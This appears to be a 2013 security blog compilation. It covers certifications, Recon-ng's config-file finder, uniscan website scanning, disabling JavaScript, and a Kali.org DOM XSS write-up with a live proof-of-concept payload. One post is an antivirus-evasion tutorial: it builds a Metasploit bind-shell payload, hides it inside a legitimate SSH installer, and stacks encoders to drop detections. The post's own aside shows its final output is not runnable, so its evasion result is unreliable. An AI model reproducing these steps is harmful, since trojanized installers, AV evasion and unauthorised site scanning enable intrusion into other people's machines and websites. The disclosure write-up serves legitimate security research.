Monday, August 5, 2013

Why CPTE IS Better Than CEH?

In today’s information age, securing data and technical assets from “hackers” has become the top priority for every organization. For this purpose, organizations hunt for people who can actually provide information security to them. These guys (or girls, in some cases) are generally referred to as “security professionals”; we can imagine them as the knights of cyberspace.

If we look a few decades back, when cyberspace was still considered a myth, when most computers were noisy, large mainframes and when the word “hack” was just for train modelling (this is not a joke), there was no concept of cyber security. But after some nasty security breaches, governments put their heads together on this issue, and cyber security departments and organizations were formed to train such people.

Nowadays we see two certifications racing each other: CPTE (Certified Penetration Testing Engineer) from mile2 and CEH (Certified Ethical Hacker) from EC-Council. But if we look at the facts, I would say CPTE has the lead in this one, and this is not a hunch.
Some interesting facts that prove CPTE is better than CEH:

Facts

  • If we analyze the course outline and material of both courses, it is clearly seen that CEH candidates are only taught how to use the tools required for the job and are otherwise not provided with knowledge.
  • CPTE candidates, on the other hand, are provided with in-depth knowledge so that they are able to counter security issues more efficiently.
  • CPTE is regularly updated and modified according to current trends in security, while CEH is only updated entirely once in several years.
  • Looking at other aspects, CPTE also enhances the business skills needed to identify protection opportunities and optimize security controls according to business needs, while CEH focuses only on the technical side of information security, and that only to the extent of teaching how to use tools.
  • Now let us look at the economic factors that make CPTE better than CEH. The CPTE exam costs $250 and the certification does not expire: if a course more advanced than CPTE is produced in the future, CPTE will remain as it is and the candidates’ certifications will not be cancelled. The CEH exam costs $500, with the possibility that the course will expire in 2 years when it is updated to a newer version; CEHv7 (the CEH version currently in use) will then have to be redone, otherwise certifications will be cancelled. That might not sound like good news to those of us who were thinking of doing CEH (because it is not good news).
  • Last but not least, the CPTE course has been accredited by the NSA itself as a National Information Assurance Training standard for system administrators, while CEH has no accreditation.

There you have it: in-depth knowledge, more comprehensive training, accreditation by the NSA. What more could a person ask for at $250? I know I am going for CPTE… wait, I already am a CPTE. I don’t know about you guys.
Cheers

Recon-ng Framework: A Quick Intro

Recon-ng is an open-source framework coded in Python by Tim Tomes, a.k.a. LaNMaSteR53. Its interface is modeled after the look of the Metasploit Framework, but it is not meant for exploitation or for spawning a Meterpreter session or a shell; it is for web-based reconnaissance and information gathering. It comes with modules to support your web reconnaissance and information gathering, just like Metasploit's auxiliary and exploit modules. Modules are categorized into Discovery, Experimental, Recon and Reporting.
As of this writing, here are the modules with their subcategories:

Discovery
---------
discovery/exploitable/http/dnn_fcklinkgallery
discovery/exploitable/http/generic_restaurantmenu
discovery/exploitable/http/webwiz_rte
discovery/info_disclosure/dns/cache_snoop
discovery/info_disclosure/http/backup_finder
discovery/info_disclosure/http/google_ids
discovery/info_disclosure/http/interesting_files

Experimental
------------
experimental/rce

Recon
-----
recon/contacts/enum/http/web/dev_diver
recon/contacts/enum/http/web/namechk
recon/contacts/enum/http/web/pwnedlist
recon/contacts/enum/http/web/should_change_password
recon/contacts/gather/http/api/jigsaw/point_usage
recon/contacts/gather/http/api/jigsaw/purchase_contact
recon/contacts/gather/http/api/jigsaw/search_contacts
recon/contacts/gather/http/api/linkedin_auth
recon/contacts/gather/http/api/twitter
recon/contacts/gather/http/api/whois_pocs
recon/contacts/gather/http/web/jigsaw
recon/contacts/gather/http/web/pgp_search
recon/contacts/support/add_contact
recon/contacts/support/mangle
recon/creds/enum/http/api/leakdb
recon/creds/enum/http/api/noisette
recon/creds/gather/http/api/pwnedlist/account_creds
recon/creds/gather/http/api/pwnedlist/api_usage
recon/creds/gather/http/api/pwnedlist/domain_creds
recon/creds/gather/http/api/pwnedlist/domain_ispwned
recon/creds/gather/http/api/pwnedlist/leak_lookup
recon/creds/gather/http/api/pwnedlist/leaks_dump
recon/hosts/enum/dns/resolve
recon/hosts/enum/http/api/builtwith
recon/hosts/enum/http/api/punkspider
recon/hosts/enum/http/api/wascompanyhacked
recon/hosts/enum/http/api/whatweb
recon/hosts/enum/http/api/whois_lookup
recon/hosts/enum/http/web/age_analyzer
recon/hosts/enum/http/web/asafaweb
recon/hosts/enum/http/web/gender_analyzer
recon/hosts/enum/http/web/ipvoid
recon/hosts/enum/http/web/malwaredomain
recon/hosts/enum/http/web/mywot
recon/hosts/enum/http/web/netbios
recon/hosts/enum/http/web/netcraft_history
recon/hosts/enum/http/web/open_resolvers
recon/hosts/enum/http/web/urlvoid
recon/hosts/enum/http/web/web_archive
recon/hosts/enum/http/web/xssed
recon/hosts/gather/dns/brute_force
recon/hosts/gather/http/api/bing_ip
recon/hosts/gather/http/api/google_site
recon/hosts/gather/http/api/shodan_hostname
recon/hosts/gather/http/web/baidu_site
recon/hosts/gather/http/web/bing_site
recon/hosts/gather/http/web/census_2012
recon/hosts/gather/http/web/google_site
recon/hosts/gather/http/web/ip_neighbor
recon/hosts/gather/http/web/mcafee/mcafee_affil
recon/hosts/gather/http/web/mcafee/mcafee_dns
recon/hosts/gather/http/web/mcafee/mcafee_mail
recon/hosts/gather/http/web/netcraft
recon/hosts/gather/http/web/yahoo_site
recon/hosts/geo/http/api/hostip
recon/hosts/geo/http/api/ipinfodb
recon/hosts/geo/http/api/maxmind
recon/hosts/geo/http/api/uniapple
recon/hosts/geo/http/web/wigle
recon/hosts/support/add_host

Reporting
---------
reporting/csv_file
reporting/html_report
reporting/list

I am also one of the contributors to this framework and have contributed mostly to the Discovery modules.
In this article I'm going to emphasize the Backup File Finder module, which I authored together with Tim Tomes (the main developer of Recon-ng). This module can be used to check specific hosts for exposed backup files. The default configuration searches for wp-config.php files, which contain WordPress database configuration information.

As a side note, this module is inspired by cmsploit.

Basic Usage:

load discovery/info_disclosure/http/backup_finder (use the module)

show options (shows the options that can be set for the module)

set source target.com (the host you want to crawl)

set uri config_file (the configuration file you want to check, e.g. wp-config.php)

Here is a screenshot of the Backup File Finder's actual crawling.

Now, here is what's inside a typical configuration file:


define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'passwd');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

List of the various configuration files used by popular CMSs which can be set in the uri option:

wp-config.php >> WordPress
config.php >> phpBB, ExpressionEngine
configuration.php >> Joomla
LocalSettings.php >> MediaWiki
mt-config.cgi >> Movable Type
settings.php >> Drupal

About The Author

This article was written by Jay Turla, a security researcher at Infosec who also performs vulnerability research.

Sunday, July 21, 2013

Follow the simple steps to find the vulnerability in any website !

Now make sure you have booted the Backtrack operating system, open the terminal, type the command below into the terminal and press Enter:
cd /pentest/web/uniscan && ./uniscan.pl
Now, as you can see in the snapshot below, a few options are given.
Now we are going to use the command below, and make sure you have the website link :)


./uniscan.pl -u http://www.website.com/ -bqdw
Your website’s URL should end with a forward slash. Now just hit Enter and the process will start :)
Now as you can see we got the IP address and the server of the website :) and wait, we will get much more information :)

Directory Check: the directory check will check the directories of the website and list them, as shown in the snapshot below.
File check: as the name says, it will check the files which are hosted on the website.
Now the crawler is started; it will grab all the email addresses, external hosts and other information:
Emails:
External hosts:
Web backdoors:
File upload forms:
Now let me tell you that using this tool we can scan websites for many more vulnerabilities like SQLi, XSS, remote code execution and many more, and you can make a few bucks by participating in bug bounty programs :)

Check out: How I got $100 from the Google bug bounty program
Now you can see in the snapshot above the list of the bugs it will find :)
Check out: The list of bug bounty programs!
Now, as shown above, the website is vulnerable to blind SQLi. :D Mission accomplished :) we have found the bug. If you have any question about this then leave a comment :)

Now if you want to get the list of the sites hosted on the same server, simply run this command, replacing the IP address with the server’s IP address; the list of websites will be stored in the same directory with the name “sites.txt”:
./uniscan.pl -i "ip:127.0.0.1"
And then if you want to scan that list of websites, simply run this command:
./uniscan.pl -f sites.txt -bqwd
Now you are done! :) I hope you have enjoyed this tutorial :)

Friday, June 7, 2013

How to Bypass Right Click Block on Any Website

You might remember an experience where you tried to right-click on a web page but got a pop-up message saying that the “right-click functionality has been disabled”. Sometimes you may be trying to copy an image or view the source of a web page, but when right-click is disabled, these things would seem impossible. Bank websites and other sites that require a secure transaction, such as a payment gateway, are the ones that impose this kind of limited functionality on their pages. In this post, I will show you the ways by which you can easily bypass the right-click block feature on any website.
In order to block right-click activity, most websites make use of JavaScript, one of the popular scripting languages used to enhance functionality, improve user experience and provide rich interactive features. In addition to this, it can also be used to strengthen a website’s security by adding some simple security features such as disabling right-click, protecting images, hiding or masking parts of a web page and so on.

How Does JavaScript Work?

Before you proceed to the next part which tells you how to disable the JavaScript functionality and bypass any of the restrictions imposed by it, it would be worthwhile for you to take up a minute to understand how JavaScript works.
JavaScript is a client side scripting language (in most cases), which means when loaded it runs from your own web browser. Most modern browsers including IE, Firefox, Chrome and others support JavaScript so that they can interpret the code and carry out actions that are defined in the script. In other words, it is your browser which is acting upon the instruction of JavaScript to carry out the defined actions such as blocking the right-click activity. So, disabling the JavaScript support on your browser can be a simple solution to bypass all the restrictions imposed by the website.

How to Disable JavaScript?

Here is a step-by-step procedure to disable JavaScript on different browsers:

For Internet Explorer:

If you are using IE, just follow the steps below:
  1. From the menu bar, go to Tools -> Internet Options.
  2. In the “Internet Options” window, switch to the Security tab and click on the button Custom level…
     (Screenshot: IE Security Settings)
  3. From the Security Settings, look for the option Active scripting and select the Disable radio button as shown above and click on “OK”.
  4. You may even select the Prompt radio button, so that each time a page is loaded, you will have the option to either enable or disable the scripting.

For Google Chrome:

If you are using Chrome, you can disable the JavaScript by following the steps below:
  1. Click on the Chrome “menu” button (on the top right corner) and select Tools.
  2. From the “Settings” page, click on Show advanced settings…
  3. Now under Privacy, click on the button Content settings…
     (Screenshot: Chrome Content Settings)
  4. Under JavaScript, select the radio button which says “Do not allow any site to run JavaScript” and click on “Done”.

For Mozilla Firefox:

Steps to disable JavaScript on Firefox:
  1. From the menu bar, click on Tools -> Options.
  2. From the Options window, switch to the Content tab, uncheck the option which says “Enable JavaScript” and click on “OK”.
     (Screenshot: Firefox Content Options)

How to Bypass the Right Click Block?

In order to bypass the right-click block or any other restriction imposed by JavaScript, all you need to do is disable it in the browser and refresh the same page, so that it now reloads without JavaScript functionality. You are now free to right-click on the page, view its source or even copy any of the images that you may want to. Don’t forget to re-enable JavaScript once your job is over; otherwise the lack of JavaScript support may result in unusual rendering of web pages.

How To Bypass Antivirus Detection - Making An Executable FUD

In this tutorial we will show you, step by step, how to make an executable fully undetectable (FUD) by antivirus products. Though there are lots of approaches, our team member Malik Rafay has managed to find a way to make an executable FUD using msfencode.


Requirements 

A Backtrack machine, real or virtual. I used Backtrack 5 R3, but other versions of Backtrack work OK too!

Attention!!!

We are using some harmless test files, but don't infect people with any real viruses; that's a crime, and we here at RHA are not responsible for

Purpose:

Antivirus protects machines from malware, but not all of it. There are ways to pack malware to make it harder to detect. We'll use Metasploit to render malware completely invisible to antivirus.

Creating a Listener:

This is a simple payload that gives the attacker remote control of a machine. It is not a virus and won't spread, but it is detected by antivirus engines. In Backtrack, in a Terminal window, execute these commands:

cd
msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe
ls -l listen.exe


You should see the listen.exe file as shown below:


Analyzing the Listener with VirusTotal

Go to https://www.virustotal.com/en/

Click the "Choose File" button. Navigate to /root and double-click listen.exe. "listen.exe" appears in the "Choose File" box, as shown below:

In the VirusTotal web page, click the "Scan it!" button.
If you see a "File already analyzed" message, click the "View last analysis" button.
The analysis shows that many of the antivirus engines detected the file: 33 out of 42 when I did it, as shown below. You may see different numbers, but many of the engines should detect it.
Encoding the Listener

This process will encode the listener and insert it into an innocent SSH client installer.
In BackTrack, in a Terminal window, execute these commands:
wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exe
msfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1
ls -l evil*

You should see the evil_ssh.exe file as shown below:



Scan with VirusTotal

Go to: https://www.virustotal.com/
If you see a "File already analyzed" message, click the "View last analysis" button.
The analysis shows that fewer of the antivirus engines detect the file now--21 out of 42, when I did it, as shown below. You may see different numbers.
 

Encode the Listener Again

This process will encode the listener with several different encoders.

In BackTrack, in a Terminal window, execute these commands:
msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1
msfencode -i /root/listen2.exe -t raw -o /root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1
msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1
ls -l listen*
You should see several files, as shown below:


Analyzing Again
The analysis shows that fewer of the antivirus engines detect the file now: 0 out of 42 when I did it, as shown below. You may see different numbers. Note that with -t raw (and with no -t at all, since raw is msfencode's default output format) the output is raw encoded shellcode rather than a PE file, so the final listen5.exe is not a runnable Windows executable; that alone goes a long way toward explaining the drop in detections.

Tuesday, May 21, 2013

Kali Linux DOM Based XSS Writeup

Recently, I have been on a mission to find XSS in popular security training websites, since these are the ones who care about their security the most. I have been successful in finding it in almost all of the ones I have tried to date. This one was a bit interesting, so I thought I would write a post on it. Basically it was not a reflected/stored XSS but a DOM based XSS, similar to the one I found in Microsoft. Unlike the others, this particular XSS occurs in client-side JavaScript.

In order to provide features to users, lots of webmasters/vendors are moving their code to the client side: the data is embedded in the DOM and is not filtered before it is reflected back to the user, which results in a DOM based XSS. The main cause of these vulnerabilities is dangerous sinks. The DOM based XSS wiki is a good source where you can find dangerous sources and sinks.

On checking out the source of kali.org, I immediately found that it was running WordPress version 3.5.1. This is the latest version of WordPress and has no known public vulnerabilities to date, therefore I moved towards testing plugins.



I tested a couple of plugins, but did not find any of them vulnerable. By analyzing the source more deeply I found a pretty interesting plugin, "WP-Pretty Photo", which caught my interest; it is a jQuery-based lightbox for the WordPress platform.


While searching for common vulnerabilities in the wp-prettyphoto plugin, I found that it was vulnerable to DOM based XSS. So I quickly added my payload to the URL and bam, it triggered an XSS.




POC:

http://www.kali.org/#!%22%3E%3Cimg%20src=1%20onerror=prompt%280%29;%3E//

Some debugging with the Chrome JS console led me to line 79 of jquery.prettyPhoto.js, the line of code which was responsible for the DOM based XSS.

http://www.kali.org/wp-content/themes/persuasion/lib/scripts/prettyphoto/js/jquery.prettyPhoto.js?ver=2.1


It was also obvious from the code that it required a ! sign to successfully execute the JavaScript.


The input inside hashrel was not filtered before it was displayed to the user, which resulted in the DOM based XSS.
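As an added illustration (example code written for this page, not code from prettyPhoto or from the post): the unsafe shape described above, a fragment value flowing unfiltered into an HTML sink, beside a hardened version that only accepts fragments matching the shape the feature needs and escapes them before building markup. The `#!tag/index/` fragment layout used here is an assumption made for the example, not prettyPhoto's real format, and the hash string is constructed from the POC URL on the page.

```javascript
// Unsafe shape described in the post: the value after "#!" is taken from the
// URL fragment and dropped straight into markup (an innerHTML-style sink).
function buildMarkupUnsafe(hash) {
  const hashrel = hash.replace(/^#!/, "");
  return '<a rel="' + hashrel + '">gallery</a>';
}

// Hardened step 1: accept only fragments with the exact shape the feature
// needs. The "#!tag/index/" layout is an assumption made for this example.
const HASH_PATTERN = /^#!([A-Za-z0-9_-]{1,64})\/(\d{1,4})\/$/;

function parseHash(hash) {
  const m = HASH_PATTERN.exec(hash);
  return m ? { tag: m[1], index: Number(m[2]) } : null;
}

// Hardened step 2: escape even allowlisted values before interpolation, so a
// later relaxation of HASH_PATTERN cannot quietly reopen the sink.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function buildMarkupSafe(hash) {
  const parsed = parseHash(hash);
  if (parsed === null) return null; // unrecognised fragment: do nothing
  return '<a rel="' + escapeHtml(parsed.tag) + '" data-index="' + parsed.index + '">gallery</a>';
}

// The fragment of the post's proof-of-concept URL, percent-decoded here so the
// example operates on the literal characters (constructed from the POC URL).
const POC_HASH = "#" + decodeURIComponent("!%22%3E%3Cimg%20src=1%20onerror=prompt%280%29;%3E//");

// Runs the same fragment through both paths, plus a benign fragment.
function demo() {
  return {
    unsafe: buildMarkupUnsafe(POC_HASH), // payload lands inside the markup
    safe: buildMarkupSafe(POC_HASH),     // null: rejected by HASH_PATTERN
    benign: buildMarkupSafe("#!gallery-1/3/"),
  };
}
```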

The Fix

The following URL discusses the fix:

https://github.com/Duncaen/prettyphoto/commit/3ef0ddfefebbcc6bbe9245f9cea87e26838e9bbc

If this was not enough for you, then listen to this: the Offensive Security team was very awesome, in the sense that they gave me a free voucher for their famous certification PWB 3.0.

 
I was really surprised to see that Dominator was not detecting it, which is the only good tool for finding DOM based XSS, leaving IBM's JavaScript scan apart. In the past I have tried Dominator against various websites suffering from DOM based XSS and have found that at some spots it's very good and at some spots it needs much improvement. Here is the screenshot:




I would like everyone to act the same way I did and responsibly disclose every issue you find.

Friday, May 17, 2013

In this post, I am going to show you how to use your Gmail account to send and receive emails from multiple addresses. Most of us own more than one email account, say for example one from Gmail, one from Yahoo and one from Hotmail. If you are tired of logging into multiple accounts to check your inbox or send emails, I have a solution here.
Gmail has an option to integrate multiple email accounts (email addresses) into a single Gmail account. Once you integrate multiple email addresses into your Gmail account, you can use the same account to send and receive emails for the different email addresses you have. Let’s take a simple example.
Suppose you have three email addresses (email accounts):
  1. john@gmail.com
  2. john@yahoo.com
  3. john@hotmail.com
You can integrate the emails john@yahoo.com and john@hotmail.com to john@gmail.com and operate all the three accounts from your single gmail account. Here is a step-by-step procedure to do this:
  1. Login to your gmail account.
  2. Click on Settings at the top right corner.
  3. Under Settings, click on the  Accounts tab.
  4. Now you’ll see the first option, “Send mail as:”.
  5. Under this option, click on Add another email address you own.
  6. Now a small new window will pop-up asking you to enter the details of your new email address.
  7. Here you can enter any name and any email address. The email address need not belong to gmail only. You can enter your yahoo, hotmail or any other valid email address.
  8. A Verification email will be sent to the address that you specify. Once you verify that you own the email address, it will be integrated to your Gmail account.
Now, when you compose a new email, you’ll see an option to select from multiple addresses to send the mail from. Also, you’ll receive the incoming mails for multiple addresses in a single mailbox. I hope this will benefit you.
Before you leave, I should also tell you one good advantage of this. According to Gmail’s privacy policy, they will not send the user’s IP address in outgoing emails. That means when you send an email from your Gmail account, the receiver will not be able to find out your IP address. But you do not have this advantage with Yahoo or other email providers.
Please share your opinions through comments. I hope this helps.